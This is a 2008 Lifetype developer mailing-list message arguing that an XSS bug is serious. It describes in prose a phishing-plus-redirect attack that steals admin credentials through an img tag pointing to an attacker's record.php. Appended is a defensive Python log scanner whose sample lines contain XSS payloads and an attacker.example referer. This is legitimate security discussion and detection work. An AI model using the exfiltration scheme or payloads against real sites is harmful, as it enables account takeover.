[pLog-svn] Lifetype 1.2.8 ...

Matt Wood matt at woodzy.com
Mon May 5 10:44:53 EDT 2008


Here is a common exploitation scenario for you...

An Attacker is targeting the lifetype.net site, he wants admin.

He knows from emails and reading around that Oscar, Reto, Mark and Jon are
likely to have admin on that page, so he makes a webpage on geocities or
google or something.

On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
that immediately redirects you to lifetype.net/admin.php with some
javascript payload utilizing the XSS exploit.

This javascript payload can utilize XSS to create an img tag, this img tag
has a src of http://attackpage/record.php?data=admincredentials-base64ed(orsomething)
as long as the data fits in the get parameters. You could also
create a form and have no limit.

Now all the attacker has to do is email each of you telling you that he has
found a serious bug in lifetype, and he has screenshots on this page
http://google/blah.(html|php|jpg) (depending on his level of control of the
site). Maybe he even puts screen shots on there so it doesn't look too
scary... and uses an iframe to do the actual attack. You would never know
unless you are monitoring all your traffic through a proxy.

XSS is ALWAYS serious.

On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:

> >       Can you post an example?  I am still not getting how
> > the server-side is involved. I understand that if I put
> > javascript on the admin's site, the javascript would have
> > access to stuff, but the browser is supposed to block
> > javascript from grabbing stuff from one site and posting it
> > to another, right?  So, somehow he grabs stuff via
> > javascript, posts it to admin.php which then posts stuff to
> > another site?
>
> I have no idea either. Reto, if you can provide an example here, that
> will be very helpful.
>
> >       Sure, that's fine, but as far as I can tell, all inputs
> > would be susceptible to the same problem, so fixing one
> > variable isn't really a fix.
>
> Not "all" inputs, just those inputs where we use the string validator and
> are not filtered by htmlfilter (strip tags), or are displayed without
> escaping HTML special characters ...
>
> I think quite few ..
>
> Mark
>
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://limedaley.com/mailman/listinfo/plog-svn
>
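A defensive check for the scenario Matt describes, added here as an example and not code from the thread or from Lifetype: it scans constructed Apache-style access-log lines for requests to admin.php whose decoded query parameters carry markup, and notes when the Referer is a site other than the blog's own. The hostnames, paths and parameter names are assumed, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample lines in Apache "combined" format; hosts, paths and
# query strings are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2008:10:12:01 -0400] "GET /admin.php?op=newPost HTTP/1.1" 200 5120 "http://lifetype.example/admin.php" "Mozilla/5.0"
203.0.113.9 - - [05/May/2008:10:13:44 -0400] "GET /admin.php?op=editLink&name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4096 "http://attacker.example/blah.html" "Mozilla/5.0"
203.0.113.9 - - [05/May/2008:10:13:45 -0400] "GET /admin.php?op=editLink&name=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Coarse signs of injected markup: a tag, an on*= event handler, a javascript: URL.
# Expect some false positives (e.g. a parameter named "button"); tune for your app.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z]|on[a-z]+\s*=|javascript:', re.IGNORECASE)


def flag_admin_requests(log_text, site_host, admin_path="/admin.php"):
    """Return (client_ip, reason, url) for admin requests whose query carries markup."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["url"])
        if parts.path != admin_path:
            continue
        # parse_qsl decodes once; a second unquote also catches double-encoded payloads
        params = parse_qsl(parts.query, keep_blank_values=True)
        tainted = [k for k, v in params if MARKUP_RE.search(unquote_plus(v))]
        if not tainted:
            continue
        ref_host = urlsplit(m["referer"]).netloc
        offsite = m["referer"] != "-" and ref_host != site_host
        reason = "markup in %s" % ",".join(tainted)
        if offsite:
            reason += "; referer off-site (%s)" % ref_host
        findings.append((m["ip"], reason, m["url"]))
    return findings


if __name__ == "__main__":
    for ip, reason, url in flag_admin_requests(SAMPLE_LOG, "lifetype.example"):
        print(ip, reason, url)
```

The off-site Referer is only a hint, since the redirect page can suppress it (the third sample line has none); the markup check is the part that should fire regardless.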